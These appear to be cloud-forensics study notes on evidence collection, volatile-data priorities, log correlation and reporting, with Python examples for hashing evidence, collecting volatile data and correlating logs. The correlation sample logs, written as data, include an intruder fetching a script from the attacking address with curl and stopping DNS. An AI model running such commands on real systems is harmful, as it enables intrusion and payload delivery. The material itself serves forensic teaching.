Cloud forensics is the application of scientific principles, technological practices, and derived and proven methods to reconstruct past cloud computing events through the identification, collection, preservation, examination, interpretation, and reporting of digital evidence.
Digital forensics is generally considered the application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
Forensic science is generally defined as the application of science to the law.
Network forensics is the capture, storage, and analysis of network events. The idea is to capture every packet of network traffic and make it available in a single searchable store so that the traffic can be examined and analyzed in detail. Full packet capture is rarely feasible at cloud scale (traffic volume, encryption, and the provider's control of the network fabric), so flow records such as VPC flow logs are often the practical substitute.
The goal of the following standards is to promote best practices for the acquisition and investigation of digital evidence.
| Standard | Scope |
|---|---|
| ISO/IEC 27037 | Guidelines for the identification, collection, acquisition, and preservation of digital evidence |
| ISO/IEC 27041 | Guidance on assuring the suitability and adequacy of incident investigation methods |
| ISO/IEC 27042 | Guidelines for the analysis and interpretation of digital evidence |
| ISO/IEC 27043 | Incident investigation principles and processes |
| ISO/IEC 27050 | Electronic discovery (eDiscovery): overview and concepts |
Challenges with cloud forensics:
- Control over data (trustworthiness): the tenant does not control the underlying infrastructure, so the trustworthiness of provider-supplied evidence must be established
- Data volatility: instances, containers, and their memory can disappear on restart or scale-in
- Evidence acquisition: physical access to media is unavailable, and acquisition depends on provider APIs and logs
Access to data is determined by the following:
- The service model (IaaS, PaaS, or SaaS: the higher the tenant sits in the stack, the less evidence it can collect itself)
- The legal system of the jurisdiction where the data is physically stored
In certain jurisdictions (Texas, Colorado, and Michigan, for example) performing digital forensic analysis requires a license.
The first phase is collection: identify and preserve evidence and begin chain of custody documentation.
Label, record, and acquire the evidence, and ensure that no modification occurs.
- Develop a plan to acquire the data; important factors for prioritization include:
  - Likely value
  - Volatility
  - Amount of effort required
- Acquire the data
- Verify the integrity of the data (hash the original and the acquired copy and compare)
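The acquisition and integrity-verification steps above as an added example (not code from the original page): the evidence is hashed before it is copied, the copy is hashed again and compared, a chain-of-custody record is appended to a log, and a later verification detects any change. The file paths, case ID, custodian name, and the sample log file are all constructed for the example.

```python
"""Acquire a file as evidence, verify its integrity, and log chain of custody.

Added example, not from the original page. Paths, the case ID and the
custodian name are hypothetical; the 'evidence' is a constructed sample
file written at runtime so the script runs offline.
"""
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime, timezone


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Hash a file in chunks so large images need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def acquire(source: str, evidence_dir: str, custodian: str, case_id: str) -> dict:
    """Copy `source` into `evidence_dir`, hash before and after, and return a
    chain-of-custody record. Raises if the copy does not match the source."""
    os.makedirs(evidence_dir, exist_ok=True)
    pre_hash = sha256_file(source)               # hash the original first
    dest = os.path.join(evidence_dir, os.path.basename(source))
    shutil.copy2(source, dest)                   # copy2 keeps timestamp metadata
    os.chmod(dest, 0o444)                        # read-only: guard against accidental writes
    post_hash = sha256_file(dest)
    if pre_hash != post_hash:
        raise RuntimeError("acquired copy does not match source")
    record = {
        "case_id": case_id,
        "item": dest,
        "source": source,
        "sha256": post_hash,
        "size_bytes": os.path.getsize(dest),
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "custodian": custodian,
    }
    # Append-only custody log; every later transfer adds another entry.
    with open(os.path.join(evidence_dir, "chain_of_custody.jsonl"), "a") as log:
        log.write(json.dumps(record) + "\n")
    return record


def verify(record: dict) -> bool:
    """Re-hash the evidence item and compare with the hash recorded at acquisition."""
    return sha256_file(record["item"]) == record["sha256"]


def demo() -> tuple:
    """Acquire a constructed sample file, then show that verify() passes on the
    untouched copy and fails once the copy has been altered."""
    work = tempfile.mkdtemp(prefix="case_")
    src = os.path.join(work, "auth.log")
    with open(src, "w") as f:                    # constructed sample evidence
        f.write("Mar 10 07:02:11 web01 named[812]: exiting\n")
    rec = acquire(src, os.path.join(work, "evidence"), "A. Examiner", "CASE-0001")
    ok_before = verify(rec)
    os.chmod(rec["item"], 0o644)
    with open(rec["item"], "a") as f:            # simulate tampering after acquisition
        f.write("tampered\n")
    ok_after = verify(rec)
    return ok_before, ok_after


if __name__ == "__main__":
    print(demo())   # (True, False)
```

The record is written as one JSON line per custody event so the log can only grow; in practice the hash and timestamp are also recorded on the physical evidence tag and signed by the custodian.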
Network forensics has various use cases for data acquisition and collection:
- Uncovering proof of an attack
- Troubleshooting performance issues
- Monitoring activity for compliance with policies
- Sourcing data leaks
- Creating audit trails for business transactions
Prioritization Order for Volatile Data
- Network connections
- Login sessions
- Contents of memory
- Running processes
- Open files
- Network configuration
- Operating system time
Alternative Prioritization for Volatile Data
- CPU cache, registers, RAM
- Virtual memory
- Disk drives
- Backups and printouts
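The first prioritization list above as a collection procedure, written as an added example that is not from the original page: each artifact is captured in order of volatility, timestamped, written to disk and hashed as it is taken, and a missing tool is recorded instead of aborting the run so the less volatile items are still collected. The Linux commands are an assumption about the host being triaged; on another platform substitute the local equivalents. Note that /proc/meminfo only summarizes memory; a full RAM image needs a dedicated acquisition tool, and the collector's own commands alter process and file state, so the manifest it writes is also the record of that footprint.

```python
"""Collect volatile data in order of volatility, timestamping and hashing each
artifact as it is captured. Added example, not from the original page; the
Linux commands in LINUX_VOLATILE_STEPS are assumptions about the target host."""
import hashlib
import json
import os
import subprocess
import sys
import tempfile
from datetime import datetime, timezone

# Most volatile first, following the prioritization list on this page.
LINUX_VOLATILE_STEPS = [
    ("network_connections", ["ss", "-tanp"]),
    ("login_sessions", ["who", "-a"]),
    ("memory_summary", ["cat", "/proc/meminfo"]),   # full RAM capture needs a dedicated tool
    ("running_processes", ["ps", "-eo", "pid,ppid,user,lstart,cmd"]),
    ("open_files", ["lsof", "-nP"]),
    ("network_configuration", ["ip", "addr"]),
    ("os_time", ["date", "-u", "+%Y-%m-%dT%H:%M:%SZ"]),
]

# Constructed steps that run on any host, used only to exercise the collector.
PORTABLE_STEPS = [
    ("greeting", [sys.executable, "-c", "print('hello', end='')"]),
    ("missing_tool", ["no-such-tool-for-this-example"]),
]


def collect(steps, outdir=None, timeout=30):
    """Run each step in the given order, save raw stdout under outdir, and
    return one record per step: when it ran, what was run, its exit status,
    and the SHA-256 of the captured output. A missing or hung tool is
    recorded, not fatal, so later (less volatile) items are still captured."""
    outdir = outdir or tempfile.mkdtemp(prefix="volatile_")
    os.makedirs(outdir, exist_ok=True)
    records = []
    for label, cmd in steps:
        started = datetime.now(timezone.utc).isoformat()
        try:
            proc = subprocess.run(cmd, capture_output=True, timeout=timeout)
            data, status = proc.stdout, proc.returncode
        except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
            data, status = b"", f"not collected: {exc.__class__.__name__}"
        path = os.path.join(outdir, f"{label}.txt")
        with open(path, "wb") as f:
            f.write(data)
        records.append({
            "label": label,
            "command": " ".join(cmd),
            "started_at": started,
            "status": status,
            "output_file": path,
            "sha256": hashlib.sha256(data).hexdigest(),
        })
    # The manifest is written last; it is itself evidence of what was collected and when.
    with open(os.path.join(outdir, "manifest.json"), "w") as f:
        json.dump(records, f, indent=2)
    return records


if __name__ == "__main__":
    for r in collect(LINUX_VOLATILE_STEPS):
        print(r["started_at"], r["label"], r["status"], r["sha256"][:16])
```

Run it from trusted, statically linked binaries on removable media where possible, since the tools on a compromised host may themselves be altered; the manifest records exactly which command produced each artifact so that choice can be defended later.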
After data has been collected, the next phase is to examine the data, which involves assessing and extracting the relevant pieces of information from the collected data.
Examination yields data: just the facts. For example:
- File opened at 10:23 AM
- DNS stopped at 7:02 AM
The analysis should include identifying people, places, items, and events and determining how these elements are related so that a conclusion can be reached.
Often, this effort includes correlating data among multiple sources. For instance, a NIDS log may link an event to a host, the host audit logs may link the event to a specific user account, and the host IDS log may indicate what actions that user performed.
How to identify who completed an event:
- Source address
- User identity (if authenticated or otherwise known)
- Service name and protocol
- Window, form, or page (such as URL address)
- Application address
- Application identifier
Analysis yields information: data placed in context. For example:
- DNS stopped at 7:02 AM but nobody should have had access to DNS at 7:02 AM...
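The correlation chain described above (NIDS alert, host audit log, host IDS log) and the "DNS stopped at 7:02" example as working code, added here and not taken from the original page. The three log excerpts are constructed samples: the auth.log lines follow the usual OpenSSH syslog format, while the NIDS and host-IDS lines use a hypothetical key=value format. The IP-to-hostname inventory and the log year (syslog lines carry none) are assumptions. Each alert is linked to a host through the inventory, to a user through a successful login from the alerting source address shortly afterwards, and to that user's actions on the host during the session window.

```python
"""Correlate a NIDS alert with host audit and host IDS logs to answer who did
what, where, and from which address. Added example, not from the original
page. All three excerpts are constructed; the auth.log lines use the standard
OpenSSH syslog format, the other two a hypothetical key=value format."""
import re
from datetime import datetime, timedelta, timezone

NIDS_LOG = """\
2024-03-10T06:40:12Z alert src=198.51.100.7 dst=10.0.0.12 dport=443 sig="TLS scanner"
2024-03-10T07:01:58Z alert src=203.0.113.5 dst=10.0.0.12 dport=22 sig="SSH brute force"
"""

AUTH_LOG = """\
Mar 10 06:55:40 web01 sshd[1390]: Failed password for root from 203.0.113.5 port 44490 ssh2
Mar 10 07:02:03 web01 sshd[1412]: Accepted password for deploy from 203.0.113.5 port 44512 ssh2
Mar 10 07:30:00 web01 sshd[1500]: Accepted publickey for alice from 192.0.2.9 port 50000 ssh2
"""

HIDS_LOG = """\
2024-03-10T07:02:11Z host=web01 user=deploy exec=/usr/bin/systemctl args="stop named"
2024-03-10T07:02:40Z host=web01 user=deploy exec=/usr/bin/curl args="http://203.0.113.5/x.sh"
2024-03-10T07:31:00Z host=web01 user=alice exec=/usr/bin/vim args="/etc/hosts"
"""

HOSTS = {"10.0.0.12": "web01"}   # assumed asset inventory: IP -> hostname
LOG_YEAR = 2024                  # assumed: syslog timestamps carry no year

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
AUTH = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) sshd\[\d+\]: "
                  r"Accepted \w+ for (\S+) from (\S+) port")


def parse_kv(line):
    """Parse '<iso-timestamp> key=value ...' into a dict with a tz-aware ts."""
    ts, rest = line.split(" ", 1)
    fields = {k: v.strip('"') for k, v in KV.findall(rest)}
    fields["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return fields


def parse_auth(line):
    """Return a login record for an sshd 'Accepted' line, else None."""
    m = AUTH.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return {"ts": ts.replace(tzinfo=timezone.utc), "host": m.group(2),
            "user": m.group(3), "src": m.group(4)}


def correlate(nids, auth, hids, window=timedelta(minutes=10)):
    """Link each NIDS alert to a host, a user, and that user's actions."""
    alerts = [parse_kv(l) for l in nids.splitlines() if l.strip()]
    logins = [e for e in (parse_auth(l) for l in auth.splitlines()) if e]
    actions = [parse_kv(l) for l in hids.splitlines() if l.strip()]
    findings = []
    for a in alerts:
        host = HOSTS.get(a["dst"])                       # alert -> host
        for login in logins:                             # host + src IP -> user
            if login["host"] != host or login["src"] != a["src"]:
                continue
            if not (a["ts"] <= login["ts"] <= a["ts"] + window):
                continue
            acts = [x for x in actions                   # user -> what they did
                    if x["host"] == host and x["user"] == login["user"]
                    and login["ts"] <= x["ts"] <= login["ts"] + window]
            findings.append({
                "alert": a["sig"], "src": a["src"], "host": host,
                "user": login["user"], "login_at": login["ts"].isoformat(),
                "actions": [f"{x['exec']} {x['args']}" for x in acts],
            })
    return findings


if __name__ == "__main__":
    for f in correlate(NIDS_LOG, AUTH_LOG, HIDS_LOG):
        print(f)
```

On this sample the scanner alert produces no finding (no login ever followed from that address), while the brute-force alert yields one: the login for deploy from the same source, followed by `systemctl stop named` at 07:02:11. That is the difference between the data point "DNS stopped at 7:02" and the information that a user who arrived through a brute-forced session stopped it. Time windows and clock skew between sources are the usual source of error here, so normalize every timestamp to UTC before joining.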
The final phase is reporting, which is the process of preparing and presenting the information resulting from the analysis phase. Many factors affect reporting, including the following:
- Alternative explanations
- Audience consideration
- Actionable information
The ultimate recipient of forensic evidence collection and analysis (the entity receiving the reports) is often a court, which makes the final determination of the evidence's merits, so the report must stand up to that scrutiny.
Document what was learned. Something is always learned.